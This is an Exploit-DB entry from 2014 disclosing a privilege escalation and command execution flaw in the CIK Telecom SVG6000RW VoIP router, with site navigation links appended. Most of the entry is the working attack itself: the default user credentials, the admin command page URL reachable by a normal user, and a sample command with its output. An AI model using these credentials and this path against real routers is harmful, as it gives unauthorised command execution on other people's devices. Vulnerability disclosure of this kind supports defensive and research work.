CIK Telecom VoIP Router SVG6000RW - Privilege Escalation / Command Execution

EDB-ID:

35556

CVE:


EDB Verified:

Author:

Chako

Type:

webapps

Exploit:   /  

Platform:

Hardware

Date:

2014-12-17

Vulnerable App: 
####################################################################
#
# Exploit Title: CIK Telecom VoIP router SVG6000RW Privilege Escalation and Command Execution
# Date: 2014/12/10
# Exploit Author: Chako
# Vendor Homepage: https://www.ciktel.com/
#
####################################################################

Description:
  CIK Telecom VoIP router SVG6000RW has a Privilege Escalation vulnerabilitie
  and can lead to Command Execution.


Exploit:

1) Login as a normal user 
   Default Username: User Password:cikvoip

2) change URL to http://URL/adm/system_command.asp
   and now u can run commands.


Example:

Command: ls /etc_rw/web

Result:

internet
cgi-bin
homemode_conf.asp
menu-en.swf
wireless
md5.js
hotelmode_conf.asp
waitAndReboot.asp
graphics
menu.swf
getMac.asp
quickconfig.asp
javascript
firewall
home.asp
customermode_conf.asp
wait.asp
station
login.asp
main.css
overview.asp
style
voip
lang
wps
usb
adm
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services